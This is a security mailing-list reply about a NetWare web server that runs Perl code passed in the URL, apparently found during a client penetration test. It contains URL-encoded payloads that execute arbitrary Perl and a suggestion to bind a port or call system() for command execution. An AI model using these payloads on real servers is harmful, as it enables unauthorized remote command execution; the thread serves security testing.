Re: Re-opening an old thread: NetWare-Enterprise-Web-Server/5.1 --As sistence requested.

[Jon DeShirley <jond () csds uidaho edu>]

> Hey - let me re-open a thread again, if you folks don't mind.  I've found a
> server at one of our pen-test clients with this NetWare HTTP/HTTPS server.

> Attempt:  http://address/perl/-v
> Result:         NetWare port Copyright 1998 Novell Corporation.
>                 All rights reserved.

What does perl -V tell you, if anything at all?  If you're lucky, this 
will tell you if you've got libraries available to you with which you 
can have some fun with minimal code.  Otherwise, you'll have to code a 
lot of the module functions into your URL.

> Attempt: http://address/perl/-e%20print%20%22hello%20world%22;
> Result: IE just hangs there "DONE"
>
> Attempt: http://address/perl/-e%20print%201;
> Result: IE just hangs there "DONE"

These will hang because your browser doesn't know what kind of content 
to display.  Something like this should provide some output:

http://address/perl/-e%22%20print%20%22Content-type:%20text%2fplain\n\nhello\n%22%22

FYI, there's a Content-type database here: 
http://reliableanswers.com/ContentType/

As for what to do, you could probably wire up a quick perl program to 
bind an unprivledged port to a rconsole or just use it to system() some 
commands.

--jon


----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/